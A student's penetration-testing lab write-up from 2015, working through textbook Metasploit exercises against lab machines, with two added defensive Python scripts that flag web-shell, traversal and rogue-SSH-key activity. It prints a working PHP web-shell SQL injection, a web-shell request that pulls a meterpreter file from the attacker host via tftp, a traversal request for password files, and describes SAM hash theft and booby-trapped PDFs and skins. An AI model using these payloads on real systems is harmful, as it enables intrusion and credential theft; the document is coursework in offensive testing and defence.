Lab 7 - Exploitation
NCS 430 Penetration Testing
Lab 7
Sunday, March 29, 2015
John Salamy
Item I. (What were you asked to do?)

Metasploit Server Side Exploits
Perform the exercises in chapter 8 of the Penetration Testing book. Provide a summary of the exploits you performed and their results in your lab write-up.

Password Attacks
Perform the exercises in chapter 9 of the Penetration Testing book. Provide a summary of the exploits you performed and their results in your lab write-up.

Metasploit Client Side Exploits
Perform the exercises in Chapter 10 of the Penetration Testing book. Provide a summary of the exploits you performed and their results in your lab write-up.
Item II. (What did you do?)

Revisiting MS08-067 Metasploit Payloads
In this section of the lab we recreate the exploit that we did in Chapter 4. We use the MS08-067 exploit to attack the Windows XP machine from the Kali virtual machine. This was fairly simple, as it was previously completed in chapter 4. The options and results are in figure 1.1.

Figure 1.1

Exploiting WebDAV Default Credentials
In the previous chapter we discovered an installation of XAMPP running on the target XP machine. Since the credentials were not changed, the default credentials are in place. This allows us to upload our own items to the server. First we create a test.txt file and log in to the server with the default credentials of wampp and xampp. We then upload test.txt and attempt to reach the file with a web browser, which was successful. See figures 1.2 and 1.3.
Figure 1.2

Figure 1.3

Running a Script on the Target Web Server
While uploading a text file is a success, it cannot do as much as a script would. Therefore in this section of the lab we upload a script to the same server with default credentials. See figure 1.4, which shows an ls of the webdav directory with the test.php script that was uploaded.

Figure 1.4
Uploading a Msfvenom Payload
Uploading a script will only get us so far on the target; it would be more beneficial to be able to upload a msfvenom payload, because it is much easier to create a msfvenom payload than it would be to write a script. In this section we first create a msfvenom payload that will cause the infected system to open a session with the Kali machine. See figure 1.5.

Figure 1.5

We next upload the payload to the same XAMPP server that had the default credentials. See figure 1.6.

Figure 1.6

We then set up the handler that will accept the request generated upon execution of the payload. We then started the handler so that when the request was made it could handle it and allow access to the system. See figure 1.7.
Figure 1.7

Lastly we downloaded the file from the server and the payload was executed. It allowed the session to be created and the attacker was able to gain access to the system. See figure 1.8.

Figure 1.8

Exploiting Open phpMyAdmin
The same server that we were previously able to exploit with default credentials also has an open phpMyAdmin service which can be exploited. By navigating to the phpMyAdmin page on the server we are able to run an SQL query that will also allow us access to the target system. It will also enable us to gain files as well as important information from the target. In the phpMyAdmin page shown in figure 1.9 we run the following query:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"

This writes a script that lets us pass a command to the server through the cmd GET parameter, which we later use to obtain files from it. To test the newly exploited vulnerability we tried to run ipconfig and were able to do so successfully; see figure 1.10.

Figure 1.9

Figure 1.10

Downloading a File with TFTP
In this section we attempt a second method for downloading files from our Kali machine. This method uses TFTP. First we start the service using the following command:

atftpd --daemon --bind-address 192.168.20.9 /tmp

Next, we download the file using the following request through the web shell:

http://192.168.20.10/shell.php?cmd=tftp 192.168.20.9 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php
Downloading Sensitive Files
In this section we focus again on exploiting XAMPP and downloading files from the target XP machine. First we download the FileZilla FTP server configuration file through the Zervit server using the following request:

http://192.168.20.10:3232/index.html?../../../../../../xampp/filezillaftp/filezilla%20server.xml

Stored in this file are the hashes of the users' passwords, which can be obtained using a password cracker, as we will discuss in the next chapter. The next file that we download using this method is the SAM file, the Windows Security Accounts Manager file, which stores the hashes for the user account passwords. We first tried this on the currently running SAM file and it was unsuccessful; see figure 1.11. Therefore we obtained the files from the backup copies. This method was successful and we were able to obtain the SAM and SYSTEM files. See figures 1.12 and 1.13.

Figure 1.11

Figure 1.12
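An added defensive example (my code, not part of this write-up or the book): a Python scan over web-server access logs for the request patterns used in the last few sections, namely a command handed to a PHP file through cmd=, a tftp transfer issued through it, a ../ traversal like the Zervit request, and a WebDAV PUT of a script. The log lines are constructed samples in Apache combined format using the lab's addresses; the tag names are my own.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format) modelled on the
# requests in this write-up; 192.168.20.9 is the Kali box, the server is the XP target.
SAMPLE_LOG = """\
192.168.20.9 - - [29/Mar/2015:14:02:11 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.20.9 - - [29/Mar/2015:14:03:27 -0400] "GET /shell.php?cmd=ipconfig HTTP/1.1" 200 731 "-" "Mozilla/5.0"
192.168.20.9 - - [29/Mar/2015:14:05:02 -0400] "GET /shell.php?cmd=tftp%20192.168.20.9%20get%20meterpreter.php HTTP/1.1" 200 4 "-" "Mozilla/5.0"
192.168.20.9 - - [29/Mar/2015:14:06:40 -0400] "GET /index.html?../../../../../../xampp/filezillaftp/filezilla%20server.xml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.20.9 - - [29/Mar/2015:14:07:55 -0400] "PUT /webdav/test.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify(line):
    """Return the set of finding tags for one log line (empty if nothing stands out)."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    findings = set()
    target = unquote(m.group("target"))  # decode %20, %2e.. before pattern matching
    path, _, query = target.partition("?")
    # Zervit-style read of arbitrary files: ../ sequences anywhere in the request
    if "../" in target or "..\\" in target:
        findings.add("traversal")
    # A command handed to a PHP file through cmd= (the shell written via phpMyAdmin)
    params = dict(parse_qsl(query, keep_blank_values=True))
    cmd = params.get("cmd")
    if cmd is not None and path.lower().endswith(".php"):
        findings.add("webshell-cmd")
        if cmd.split()[:1] == ["tftp"]:  # file transfer into the web root
            findings.add("tftp-transfer")
    # Script dropped on the server with WebDAV PUT (default-credential upload)
    if m.group("method") == "PUT" and path.lower().endswith((".php", ".asp", ".aspx", ".jsp")):
        findings.add("webdav-script-upload")
    return findings


def scan(log_text):
    """Map 1-based line numbers of flagged lines to their sorted finding tags."""
    results = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            results[n] = sorted(tags)
    return results
```

Running scan(SAMPLE_LOG) flags lines 2 to 5 and leaves the plain GET /index.html on line 1 alone; point it at a real access_log by reading the file into log_text.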
Figure 1.13

Exploiting a Buffer Overflow in Third-Party Software
This section was designed to exploit the SLMail program running on the Windows XP target. Unfortunately, it was unsuccessful because the services on the XP machine failed to launch. See figure 1.16. These services were supposed to run POP3, which would have enabled us to exploit that service. This issue was not discovered until after the exploit failed to launch; therefore figure 1.14 shows setting the options, figure 1.15 shows the exploit that failed, and figure 1.16 shows the service that would not start.

Figure 1.14

Figure 1.15
Figure 1.16

Exploiting Third-Party Web Applications
Unfortunately, like the previous section of the lab, this section failed to launch successfully. I was able to load the module and set the options, but the exploit would not launch the payload. It was able to determine server information but not launch the payload. Others in the class were having the same issue. See figure 1.17.
Figure 1.17

Exploiting a Compromised Service
This section focuses on how to exploit a vulnerability in Very Secure FTP 2.3.4. The exploit involves placing a smiley face after the username and then entering any password. If the service is vulnerable it will allow access to the system. In our case it was vulnerable (figure 1.18). We were then able to start a netcat session (figure 1.19).

Figure 1.18

Figure 1.19

Exploiting Open NFS Shares
In this section we exploit the vulnerability that was discovered in the first hacking challenge that we completed. First we mount the NFS share. We then cd to the mount and view the contents of the .ssh directory. In the directory are the public and private keys as well as the authorized keys. See figure 1.20.
Figure 1.20

Next we generate new SSH keys using the default options. See figure 1.21.

Figure 1.21
Next we added our key to the target's list of authorized keys. Once we have done that we are able to gain SSH access to the system without the need for a password. See figure 1.22.

Figure 1.22
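An added defensive example (my code, not from the write-up or the book): an audit of a user's authorized_keys file against an inventory of approved key fingerprints, which is how a key appended over an open NFS share, as above, would be spotted. The file contents and key blobs are constructed filler, and the approved set and the root@kali comment are assumptions.

```python
import base64
import hashlib

# Constructed sample authorized_keys file. The key blobs are filler bytes behind an SSH
# wire-format type prefix, not real keys: only the file structure matters for the audit.
KNOWN_BLOB = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519" + b"\x11" * 36).decode()
ROGUE_BLOB = base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + b"\xee" * 64).decode()
SAMPLE_AUTHORIZED_KEYS = f"""\
# key issued to the administrator's workstation
ssh-ed25519 {KNOWN_BLOB} admin@workstation
from="192.168.20.0/24" ssh-rsa {ROGUE_BLOB} root@kali
"""
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256")

def fingerprint(blob_b64):
    """SHA256 fingerprint in the form ssh-keygen -lf prints: 'SHA256:' + unpadded base64."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Yield (options, key type, blob, comment) per key line; blanks and comments skipped."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Option strings such as from="..." may precede the key type; locate the type.
        # (Options containing spaces inside quotes are not handled by this simple split.)
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        yield " ".join(fields[:idx]), fields[idx], fields[idx + 1], " ".join(fields[idx + 2:])

def audit(text, approved_fingerprints):
    """Return (fingerprint, key type, comment) for every key not in the approved set."""
    unexpected = []
    for _options, keytype, blob, comment in parse_authorized_keys(text):
        fp = fingerprint(blob)
        if fp not in approved_fingerprints:
            unexpected.append((fp, keytype, comment))
    return unexpected

APPROVED = {fingerprint(KNOWN_BLOB)}  # the inventory of keys that are supposed to be there
```

audit(SAMPLE_AUTHORIZED_KEYS, APPROVED) returns only the ssh-rsa root@kali entry; the same routine run from cron over each exported home directory gives a cheap tripwire for this technique.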
Chapter 9 focuses on password attacks. It starts with the basics, such as what a password list is and what a username list is. It then discusses a tool called crunch, which will generate a brute-force list based on the given parameters. See figure 2.1 for an example.

Figure 2.1

Guessing Usernames and Passwords with Hydra
This section uses the POP3 service that we were not able to run in chapter 8; therefore this was unsuccessful and could not be completed.

Recovering Password Hashes from a Windows SAM File
In this section we use the files obtained in chapter 8 to try to determine the passwords of the users on the Windows XP target. We run the bkhive program on the key that we obtained and it returns the Root Key and the Boot Key. We then input this information into the samdump2 program and are able to determine the hashes.

Dumping Passwords with Physical Access
We do not have physical access to the system; therefore we could not complete this section.
All Ports
The allports module in Metasploit will try to set up a connection on each port until it finds one that succeeds. This can be very useful if there is a firewall in place and we do not know which port can be leveraged. In this section we attempt this attack on the Windows XP system. See figures 2.2, 2.3 and 2.4.

Figure 2.2

Figure 2.3

Figure 2.4

Browser Exploitation
Since different types of traffic can be filtered, we can use HTTP, which is very commonly allowed through the firewall because it is essential. It can be filtered based on certain parameters, but good attacks can bypass these filters. These types of attacks are demonstrated in this section. The module we use in Metasploit is aurora. We set the options and then begin the service, which waits until our target connects back to the system. See figure 2.5.
Figure 2.5

Now we would use some sort of social engineering or spam email to get our target to connect to the needed web address. Once we do that the exploit is completed and we obtain a session with the target. See figure 2.6.

Figure 2.6

The problem with the above solution is that it causes the target's Internet Explorer to stop responding, causing them to close the program. When they close the program our session is closed. Therefore the more practical application of the attack is to have the session immediately migrate to a separate process so that it is persistent. This is exactly what we did in this section, as demonstrated in figure 2.7.
Figure 2.7

PDF Exploits
In this section we package an exploit into a PDF so that when our target opens the PDF the attack launches and we gain access. We start by using the adobe_utilprintf module of Metasploit to make the PDF. No options need to be set to create the PDF. We then moved the file to the Apache server on our local system so it can be accessed. See figure 2.8.

Figure 2.8

We then start the reverse handler on the Kali system to receive the incoming request and exploit it. We then direct the target to the file and a session is established. See figure 2.9.
Figure 2.9

We then ran into an issue where the handler closes after the first system attaches. Therefore we set the advanced options in the handler to allow for multiple sessions; see figure 2.10.

Figure 2.10

PDF Embedded Executable
In this section we bundle a malicious payload inside a PDF to exploit the target system. The first step is to create the PDF. Unfortunately, the PDF file is not where the book says to find it; first I had to use locate to find the file. See figure 2.11.

Figure 2.11

I then tried to change the file type to a regular PDF, since it was .pdf.gz and the module would not accept it. Unfortunately this was unsuccessful and the module would not accept the file. See figures 2.12, 2.13 and 2.14.
Figure 2.12

Figure 2.13

Figure 2.14

Java Exploits
In this section we set up a scenario very similar to the one with Adobe. We start by creating the malicious payload using similar options to the other modules. The module used is java_jre17_jmxbean. The options for the module are set in figure 2.15; we then started the service. Next we directed the target to the URL and the connection was established, as shown in figure 2.16.

Figure 2.15
Figure 2.16

Signed Java Applet
This Metasploit module is very similar to the previous module. The benefit is that no vulnerability is needed, because we ask the user to approve the action. While it seems like doing this would be unsuccessful, many users do not bother to read the messages and just approve the action. The options for the module are set in figure 2.17, and we began the exploit.

Figure 2.17

We then connected the target to the URL listed. Upon loading the page the user is asked to approve the action; see figure 2.18.
Figure 2.18

Once the user clicks Run we are able to obtain access to the system. See figure 2.19.

Figure 2.19

browser_autopwn
Unfortunately, this module would not run successfully; it was tried multiple times and we always received the response that there were no exploit modules. See figure 2.20.
Figure 2.20

Winamp
The last section was the Winamp section. In this section we convince the user to install a vulnerable skin that will allow us access to the target system. First we have to create the malicious file to place in the skin files. We do this using a Metasploit module named winamp_maki_bof. Once we set the options the malicious file is created; see figure 2.21.

Figure 2.21
We then send the file to the Apache server so that it can be accessed from the other systems. Next we copied the default skin for Winamp and renamed it rocketship. We then replaced mcvcore.maki with the malicious file that we created. We then set the skin in Winamp to the malicious skin; once we do this Winamp closes and we have an open session to the Windows 7 target.

Difficulties
Throughout the lab we faced many difficulties that caused many of the sections not to function properly. For example, the POP3 service would not start, which caused parts of Chapter 8 not to work, which in turn caused part of chapter 9 not to function. Another issue was that the User Manual file would not be accepted by the Metasploit module because it said it was not the correct format. In addition, some of the instructions in the text were vague, which resulted in having to complete some steps several times before the user is able to properly interpret the instructions. One of the greatest points of frustration when trying to complete the lab was that the book says to kill the handler job and that you can just start it back up, but every time I did this I was not able to bring the handler back up. Each time the handler was started and no session was started, I would have to reboot the entire VM before I could relaunch the handler.

What did I learn?
While there were frustrating moments in the lab, in the end I did learn a lot. Firstly, I learned many different ways to obtain access to a system besides the traditional ways that were learned in previous chapters. The lab also caused me to think twice any time I skip an update for a piece of software. I always knew how important software updates were but never realized how easy it was to exploit an outdated version of Java. In addition, I learned how easy it was to create malicious payloads and place them into a file or link to a malicious website. It may be that I was naive, but I always thought these types of exploits took someone with a high level of programming knowledge; it turns out they do not. This lab was definitely an eye-opener.